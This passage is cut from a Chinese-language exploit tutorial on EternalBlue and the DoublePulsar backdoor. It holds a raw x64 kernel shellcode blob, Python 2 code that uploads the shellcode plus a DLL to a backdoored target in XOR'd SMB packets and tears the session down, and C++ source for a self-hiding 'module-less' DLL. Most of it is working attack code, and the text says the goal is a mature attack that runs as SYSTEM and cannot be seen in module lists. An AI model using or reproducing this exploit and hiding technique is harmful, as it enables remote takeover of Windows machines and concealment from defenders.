x75x2Ex48x89xFAx48x83xC2x14x48x31xDBx66x8Bx1Ax48x89xFAx48x83xC2x18x48x01xDAx48x89x55x10x48x89xFAx48x81xC2x88x00x00x00x48x89x55x18x48x31xC0xEBx06x48x31xC0x48xF7xD0x5Bx5Ax5FxC3x57x52x53x48x8Bx7Dx08x48x83xC7x50x48x31xDBx8Bx1Fx48x89x5Dx50x48x8Bx7Dx08x48x83xC7x30x48x8Bx17x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xD1x48x89xDAx48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x75x25x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xDAx48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx76x48x48x8Bx7Dx20x48x8Bx5Dx08x48x83xC3x54x48x31xC9x8Bx0BxF3xA4x5Ex48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x74x4Dx48xB8x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x56x48x8Bx76x48x48x89xC1x48x83xC1x14x4Dx31xD2x44x8Bx11x4Cx01xD6x48x8Bx7Dx20x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x48x83xC0x10x48x31xC9x8Bx08xF3xA4x5Ex48xFFxC2xEBxAEx48x31xC0xEBx06x48x31xC0x48xF7xD0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx20xE8x6CxFExFFxFFx48x85xC0x0Fx85x50x01x00x00xE8x1Fx05x00x00x48x85xC0x0Fx85x42x01x00x00x48x8Bx7Dx00x48xB8x08x00x00x00x00x00x00x00x48xBAx01x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x00x48x31xDBx8Bx1Ax48x01xFBx48x89x5Dx30x48x39xFBx0Fx84x0Fx01x00x00x49x89xDAx49x83xC2x10x48x31xC0x41x8Bx02x48x85xC0x0Fx84xF9x00x00x00x48x8Bx45x00x48x89xDAx48x83xC2x0Cx4Dx31xD2x44x8Bx12x4Cx01xD0x48x89xC1x48x83xECx20xFFx56x18x48x83xC4x20x48x85xC0x0Fx84xC6x00x00x00x48x89x45x48x48x89xDAx48x83xC2x00x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx38x48x89xDAx48x83xC2x10x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx40x48x8Bx55x38x48x8Bx12x48x85xD2x74x7Dx48x89xD7x49xBAx00x00x00x00x00x00x00x80x4Cx21xD7x74x0Cx48x89xD7x48x81xE7xFFxFFx00x00xEBx0Bx48x8Bx7Dx00x48x01xD7x48x83xC7x02x48x89xFAx48x8Bx4Dx48x48x83xECx20xFFx56x20x48x83xC4x20x48x85xC0x74x46x48x8Bx55x40x48x89x02xE8x07x06x00x00x48x85xC0x74x0FxE8x97x05x00x00x48x85xC0x75x05xE8xF0x04x00x00x48x8Bx55x38x48x83xC2x08x48x89x55x38x48x8Bx55x40x48x83xC2x08x48x89x55x40xE9x77xFFxFFxFFx48x8
3xC3x14xE9xF9xFExFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x48x8Bx7Dx08x48x83xC7x30x48x8Bx55x20x48x89x17x48x31xC0x5Ax5FxC3x57x52x53x51x48x8Bx55x28x48x85xD2x0Fx84xF5x00x00x00x48xB8x08x00x00x00x00x00x00x00x48xBAx05x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xC1x00x00x00x49x89xD2x49x83xC2x00x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xA3x00x00x00x48x8Bx55x20x48x01xFAx49x89xD2x49x83xC2x04x41x8Bx3Ax48x85xFFx0Fx84x91x00x00x00x48x83xEFx08x48xD1xEFx48x31xC9x48x39xF9x74x65x48x89xD3x48x83xC3x08x48x89xC8x48xD1xE0x48x01xC3x48xC7x45x58x00x00x00x00x66x8Bx03x66x25x00xF0x66xC1xE8x0Cx66x83xF8x00x74x37x66x83xF8x03x74x06x66x83xF8x0Ax75x2Bx49x89xD2x49x83xC2x00x41x8Bx02x48x89x45x58x48x31xC0x66x8Bx03x66x25xFFx0Fx48x01x45x58x48x8Bx45x20x48x03x45x58x48x8Bx5Dx28x48x01x18x48xFFxC1xEBx96x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x01xFAxE9x64xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx03x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x89xD1x48x83xC1x04x48x31xC0x8Bx01x48x85xC0x74x36x48x89xD1x48x83xC1x00x48x31xFFx8Bx39x48x85xFFx74x25x48x8Bx4Dx20x49x89xC8x48x01xF9x48x89x4Dx78x48x31xD2xBFx0Cx00x00x00xF7xF7x89xC2x48x83xECx20xFFx56x38x48x83xC4x20x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x0Fx84xE6x00x00x00x48xB8x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x49x89xC2x49x83xC2x24x48x31xFFx41x8Bx3AxC7x85xA6x00x00x00x00x00x00x00x48xF7xC7x00x00x00x02x0Fx85x9Fx00x00x00x48xF7xC7x00x00x00x40x74x0AxC7x85xA6x00x00x00x02x00x00x00x49xBAx00x00x00x80x00x00x00x00x4Cx85xD7x74x0AxC7x85xA6x00x00x00x04x00x00x00x48xF7xC7x00x00x00x20x74x26x83xBDxA6x00x00x00x02x75x0AxC7x85xA6x00x00x00x20x00x00x00x83xBDxA6x00x00x00x04x75x0AxC7x85xA6x00x00x00x40x00x00x00x48x8Bx7Dx20x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x49x89xC2x49x83xC2x08x41x8Bx0Ax52x4Cx8Dx8DxAAx00x00x00x4Cx8Bx85xA6x00x00x00x48x89xCAx48x89xF9x48x83xECx20xFFx56x30x48x83xC4x
20x5Ax48x85xC0x74x08x48xFFxC2xE9x19xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x52x57x48xBAx00x00x00x00x00x00x00x00xEBx0Cx52x57x48xBAx01x00x00x00x00x00x00x00x48x8Bx45x20x4Cx8Bx55x08x49x83xC2x28x48x31xFFx41x8Bx3Ax48x01xF8x49xB8x00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFxD0x48x83xC4x20x48x31xC0x5Fx5AxC3x48x39xECx0Fx8DxAAx00x00x00x57x56x53x48x89xE6x48x83xC6x0Cx55x6Ax00x48x89xE3x51x52x48x89xE9x48x29xF1x48x83xF9x08x0Fx8Cx81x00x00x00x50x52x53x48xB8x0Fx00x00x00x00x00x00x00x48x6BxC0x08x48x39xC8x7Dx03x48x89xC1x48xBAx00x00x00x00x00x00x00x00x48x89xC8x48xBBx08x00x00x00x00x00x00x00x48xF7xFBx48xFFxC8x6Ax00x48x83xF8x00x75xF5x48x01xCCx5Bx5Ax58x48x89xE5x48x89xE7x48x29xCFx48x89xFCxF3xA4x48x89x23x48x8Bx4BxF8x48x8Bx53xF0x48xC7x43xF8x00x00x00x00x48xC7x43xF0x00x00x00x00x48xC7x04x24xFFxFFxFFxFFx48xBExEExEExEExEExEExEExEExEExFFxE0x59x59x5Dx5Dx5Bx5Ex5FxFFxE0x48x89xE1x48x2Bx4Dx08x48x83xE9x04x48x89xECx48x83xC4x0Cx5Dx5Bx5Ex5Fx5Ax48x01xCCxFFxE2x00x00x00x00x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx0Cx00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x04x48x31xDBx8Bx1Ax48xC1xEBx02x48xB8x0Fx00x00x00x00x00x00x00x48xF7xE3x48x89x45x68x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xC2x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x74x7Cx48x89x45x60x48x8Bx46x58x48x8BxBDxAEx00x00x00x48x83xC7x03x48x89x07x48x8Bx46x68x48xA9x00x00x00x00x74x2Ex48x8Bx85xBEx00x00x00x48x8Bx9DxC6x00x00x00x48x89x03x48x8Bx5Ex60x48x8BxBDxC6x00x00x00x48x29xDFx48x8Bx9DxB6x00x00x00x48xFFxC3x48x89x3BxEBx14x48x8Bx85xBEx00x00x00x48x8BxBDxB6x00x00x00x48xFFxC7x48x89x07x48x8Bx46x68x48xA9x01x00x00x00x74x14x48x8BxBDxB6x00x00x00xC6x07xBFxEBx08x48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x56x50x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x89xEEx48x81xC6x80x00x00x00x48xB9x0Fx00x00x00x00x00x00x00xF3xA4x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x00x48xFFxC7x48x8Bx55x40x48x8Bx1Ax48x89x1Fx48x8BxB5xCEx00x00x00x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x83xC7x08x48x29xFEx48
x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x89x37x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x8Bx75x40x48x89x3Ex48x8Bx45x70x48x83xC0x0Fx48x89x45x70x58x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56xEBx4Dx48x8Bx7Dx00x48x89xDAx48x83xC2x0Cx48x03x3Ax48x89xE9x48x81xC1x8Fx00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x22x48x89xE9x48x81xC1x9Ax00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x05x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx7Dx48x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax0Fx85x9Bx00x00x00x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89xFAx48x83xC2x00x48x31xDBx8Bx1Ax48x81xFBx50x45x00x00x75x77x48x89xFEx48x83xC6x14x48x31xDBx66x8Bx1Ex48x89xFEx48x83xC6x18x48x01xDEx48x89xFBx48x83xC3x06x48x31xC9x66x8Bx0Bx48x31xD2x48x89xF3x48x83xC3x0Cx48x8Bx7Dx48x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Cx2Bx48x89xF3x48x83xC3x08x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Dx16x49x89xF2x49x83xC2x24x48x31xDBx41x8Bx1Ax48xF7xC3x00x00x00x20x75x11x48x83xC6x28x48xFFxC2x48x39xCAx7CxB0x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3xEBx4Dx90x90x90x90x90x90x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex00x00x00x21x0Dx00x00x4Ex0Dx00x00x00x09x00x00x00x5Ex0Dx00x00x00x00x00x00x00x00x00x00xE8x00x00x00x00x58x48x8Bx60xC6x48x8Bx68xCEx48x8Bx70xD6x48x8Dx0DxCAxFFxFFxFFx48x83xECx20xFFx56x40x48x83xC4x20xE9x11x01x00x00x4Cx89xC6xE9x09x01x00x00x54x55x51x52x53x56x57x48x31xDBx65x48x8Bx5Bx30x48x8Bx5Bx60x48x8Bx5Bx18x48x8Bx5Bx10x48x8Bx73x60x48x85xF6x0Fx84xA6x00x00x00x48x8Bx6Bx30x48x85xEDx0Fx84x99x00x00x00x48x31xD2xC1xC2x05x66xADx0Cx20x30xC2x66x83x3Ex00x75xF1x48x8Bx1Bx48x3Bx54x24x20x75xCAx48x89xEFx66x81x3Fx4Dx5Ax75x73x8Bx7Dx3Cx48x01xEFx81x3Fx50x45x00x00x75x65x48x89xF9x48x83xC1x18x48x85xC9x74x59x48x31xD2x8BxBFx88x00x00x00x48x01xEFx8Bx57x1Cx48x01xEAx8Bx5Fx20x48x01xEBx8Bx7Fx24x48x01xEFx49x89xD1x8Bx33x48x01xEEx48x31xD2xC1xC2x05xACx0Cx20x30xC2x80x3Ex00x75xF3x48x3Bx54x24x18x74x0Cx48x83xC7x02x48x83xC3x04xE2xDAxEBx1
0x48x0FxB7x17x48xC1xE2x02x4Cx01xCAx8Bx02x48x01xE8x5Fx5Ex5Bx5Ax59x5Dx5CxC3x06xDFxB0x2Cx51x33x8Ax8DxA4x00x78x95x27x85x00x3Bx00xA1xB4x00xDBxB6xB6xE5x00xC4x22x07xE2x00x82x5Ax15x4Ax00x02x55xF0xD6xDEx79x03xAAx86x00x0DxC4x8AxDCx00x00x48x8Bx26x50x48x31xC0x48x8Dx0Dx33x00x00x00x48x8Dx1Dx2Cx00x00x00x48x29xD9x48x89xDFxF3xAAx48x8Dx0Dx0Dx00x00x00x48x8Dx1Dx96xF0xFFxFFx48x29xD9x48x89xDFxF3xAAx58x41x5Fx41x5Ex41x5Dx41x5Cx5Ex5Fx5Dx5BxC3xEBx08x00x14x00x00x01x00x00x00"
# Continuation of the __main__ body above: upload and run the payload.
# Read the DLL to inject.  It must be a 64-bit DLL for this x64 target (the
# article notes that a mismatched bitness tends to blue-screen the target
# rather than fail cleanly); the kernel shellcode prepended below maps it
# into the chosen process.
f = open(dllfile,"rb")
dll_hex = f.read()
f.close()
#dll_hex += "x00"*3
# Split kernel_shellcode + DLL into <=4096-byte Trans2 upload packets, each
# XOR'd with the key from the ping (see make_smb_request), and send them in
# order.  The reply to each chunk is printed but not checked, and s.recv
# blocks until the backdoor answers or the socket times out.
array , ncount = make_smb_request(kernel_shellcode + dll_hex,key)
for i in range(ncount):
    #print binascii.b2a_hex(array[i])
    print i+4,",len:",len(array[i])
    s.sendall(array[i])
    data = s.recv(1024)
    print i+4,"--->",data
# Tear the session down the way a normal client would.
#end1
# Step 7: SMB_COM_TREE_DISCONNECT (command byte 0x71).
step_7_data ="x00x00x00x23xFFx53x4Dx42x71x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x00x00x00"
s.sendall(step_7_data)
data = s.recv(1024)
print 7,data
#end2
# Step 8: SMB_COM_LOGOFF_ANDX (command byte 0x74).
step_8_data 
="x00x00x00x27xFFx53x4Dx42x74x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x02xFFx00x27x00x00x00"
s.sendall(step_8_data)
data = s.recv(1024)
print 8,data
print "------Inject dll done!------"
s.close()
0x5: 永恒之蓝 + 自隐藏模块注入
我们写的 Win7 下的 exploit 功能就算基本完成了。但要完成一次成熟的攻击，不能注入进程之后进程又崩掉。DLL 注入与权限直接相关：Doublepulsar 执行后注入的代码运行在 SYSTEM（NT AUTHORITY\SYSTEM）权限下，可以采用无模块注入把 DLL 注入到受害者机器；测试后发现这同时也解决了进程崩掉的问题。这里顺便提一下无模块注入中的一些知识；关于 DLL 注入以及 x86/x64 进程互读互写，有兴趣可以自行查阅。下面介绍一种模块自隐藏的方法
：DllMain 第一次（由系统加载器）执行时，申请一块内存把 DLL 文件模拟加载，然后调用模拟加载出来的 PE 的 DllMain，于是第二次的 DllMain 就在没有模块记录的内存中执行。DLL 自卸载也不难：用 NO_MODULE_MARK（即代码中区分两次调用的标记）判断当前是哪一次调用，第一次让 DllMain 返回 FALSE，加载器就会卸载文件映射的那一份，功能类似 MemoryLoadLibrary。需要注意的是，这样只对按加载器模块链表枚举的工具不可见；扫描没有文件背景的可执行内存区域的检测仍可能发现它。
上代码:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "MemoryLoad.h"
//创建一个进程互斥量 防止无模块DLL多次注入
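// Probe whether a named mutex already exists.
//
// Returns TRUE when a mutex called pstrMutex is already present -- or when the
// probe itself fails, which is treated conservatively as "exists" so the
// caller (DllMain) aborts the load -- and FALSE when this call created it.
//
// NOTE(review): the mutex created here is closed again before returning, so
// the name disappears immediately; this only ever detects a mutex that some
// *other* code is still holding.  DllMain uses it as the anti-double-injection
// guard, but the mutex that lives for the whole process (g_hMutex, created in
// NoModuleEntryCall) has a different name -- confirm the intended pairing.
// CreateMutexA takes a narrow string, so pstrMutex must be ANSI, not TCHAR.
BOOL IsMutexExist(char* pstrMutex)
{
    HANDLE hMutex = CreateMutexA(NULL, TRUE, pstrMutex);
    if (hMutex == NULL)
    {
        // e.g. the name clashes with another kind of object: treat as existing.
        return TRUE;
    }
    // Read GetLastError() before any other call can clobber it.
    BOOL bExists = (GetLastError() == ERROR_ALREADY_EXISTS);
    // bInitialOwner is ignored when the mutex already existed, so we only own
    // it when we created it; releasing one we do not own just fails with
    // ERROR_NOT_OWNER (the original did that unconditionally).
    if (!bExists)
        ReleaseMutex(hMutex);
    CloseHandle(hMutex);
    return bExists;
}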
//调用LoadPE.cpp里的函数,自行处理PE加载,把DLL在新申请的内存加载起来,并执行入口函数
// Manually map this DLL's own file (path in dllModuleName, filled by ChooseSub)
// through LoadPE.cpp's LaunchDll and run the mapped copy's entry point with
// NO_MODULE_MARK instead of a loader reason code, so that the second DllMain
// can tell it is the module-less copy.
// NOTE(review): dllModuleName is written by GetModuleFileName (TCHAR) but handed
// over as char*; whether LaunchDll expects that is decided in LoadPE.cpp.
void LaunchNoModule()
{
    char* pszSelfPath = reinterpret_cast<char*>(dllModuleName);
    LaunchDll(pszSelfPath, NO_MODULE_MARK);
}
// Worker started by NoModuleEntryCall: the demo "payload" of the module-less
// DLL.  Never returns; emits a debugger-visible heartbeat once a second.
// Replace the loop body with real functionality.  The signature is what the
// CreateThread call site casts to LPTHREAD_START_ROUTINE; lpParameter is unused.
unsigned int __stdcall NoModuleThread(void* lpParameter)
{
    (void)lpParameter;
    for (;;)
    {
        Sleep(1000);
        OutputDebugString(L"Test by IronMan.");
    }
    return TRUE;   // unreachable; satisfies the declared return type
}
//模拟加载出来的第二份副本的真正入口：创建互斥量、打印日志并启动工作线程（正常 DLL 功能放在这里）。上面那条"调用 LoadPE.cpp"的注释属于 LaunchNoModule，这里并不加载 PE。
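// Entry point reached only by the manually-mapped copy (ChooseSub calls it when
// ul_reason_for_call == NO_MODULE_MARK).  Creates the process-lifetime mutex
// g_hMutex (released in DLL_PROCESS_DETACH), logs the image base, then starts
// the worker thread.  ul_reason_for_call and pstrModuleName are not used.
//
// NOTE(review): whether the loader lock is held here depends on how LaunchDll
// invokes this copy's DllMain; creating a thread under the loader lock is the
// classic DllMain hazard, so keep that in mind if LoadPE.cpp changes.
void NoModuleEntryCall(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
    (void)ul_reason_for_call;
    (void)pstrModuleName;

    // Name differs from the one DllMain probes with IsMutexExist, so holding
    // this mutex does not by itself stop a second injection -- confirm intent.
    TCHAR szMutexName[MAX_PATH];
    wsprintf(szMutexName, L"Test 15pb bingo! %d", GetCurrentProcessId());
    g_hMutex = CreateMutex(NULL, TRUE, szMutexName);

    TCHAR szLog[MAX_PATH] = { 0 };
    wsprintf(szLog, L"NoModuleEntryCall Module Start:%p", hModule);
    OutputDebugString(szLog);

    // Real DLL functionality goes below.  The thread keeps running after its
    // handle is closed; the original leaked the handle for the process lifetime.
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NoModuleThread, NULL, 0, NULL);
    if (hThread != NULL)
        CloseHandle(hThread);
}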
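// Decide which of the DLL's two lives is running and act accordingly.
//
// Called from DllMain with the reason code.  Two cases:
//  * NO_MODULE_MARK (from MemoryLoad.h): we are the manually-mapped copy.
//    Run the real entry work (NoModuleEntryCall) and return TRUE.
//  * anything else (a normal DLL_PROCESS_ATTACH of the file-backed image):
//    record our own path in dllModuleName, spawn the mapped copy through
//    LaunchNoModule, and return FALSE so that DllMain fails the load and the
//    loader discards the file-backed image -- only the mapped copy remains.
// exeModuleName receives the host executable's path in both cases.
// pstrModuleName is unused (the strcpy that consumed it was commented out in
// the original, which left a stray `int a = 1;` as the if-body).
BOOL ChooseSub(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
    (void)pstrModuleName;
    GetModuleFileNameA(NULL, exeModuleName, MAX_PATH);

    if (ul_reason_for_call == NO_MODULE_MARK)
    {
        NoModuleEntryCall(hModule, DLL_PROCESS_ATTACH, 0);
        return TRUE;
    }

    // Only the file-backed image has a real module handle to look up.
    GetModuleFileName(hModule, dllModuleName, MAX_PATH);
    LaunchNoModule();
    return FALSE;
}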
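// Entry point for both lives of the DLL: the loader's DLL_PROCESS_ATTACH on the
// file-backed image, and the NO_MODULE_MARK call LaunchDll makes on the
// manually-mapped copy.  Returning FALSE from the first is deliberate -- it
// makes the loader unload the file-backed image (see ChooseSub).
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    BOOL bRet = FALSE;
    if (ul_reason_for_call == DLL_PROCESS_ATTACH || ul_reason_for_call == NO_MODULE_MARK)
    {
        // Per-process guard against a second injection.  IsMutexExist calls
        // CreateMutexA, so the name must be ANSI: the original formatted it
        // into a TCHAR buffer and cast to char*, which (with UNICODE defined,
        // as the L"" literals in this file require) handed CreateMutexA the
        // wide bytes "y\0a\0..." -- a one-character mutex named "y".
        char szMutexName[MAX_PATH];
        wsprintfA(szMutexName, "yanshier2013nomoduleinject%d", GetCurrentProcessId());
        if (IsMutexExist(szMutexName))
            return FALSE;
        bRet = ChooseSub(hModule, ul_reason_for_call, (char *)lpReserved);
    }
    else if (ul_reason_for_call == DLL_PROCESS_DETACH)
    {
        // Only the mapped copy ever creates g_hMutex (NoModuleEntryCall); the
        // file-backed image can reach here with it still unset.
        if (g_hMutex != NULL)
        {
            ReleaseMutex(g_hMutex);
            CloseHandle(g_hMutex);
            g_hMutex = NULL;
        }
        bRet = TRUE;
    }
    return bRet;
}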
我注入的是 NTFSinfo 这个程序。用 PCHunter 查看该进程的模块列表时看不到自己注入的模块——它是被模拟加载到申请的内存中的，并没有登记到加载器的模块链表里。
每隔一秒用 OutputString打印出一句 Test by IronMan. 需要的话直接在NoModuleThread替换功能就可以了。
自卸载dll源码编译 vs2010 vs2013
源码打包地址: http://pan.baidu.com/s/1miObL00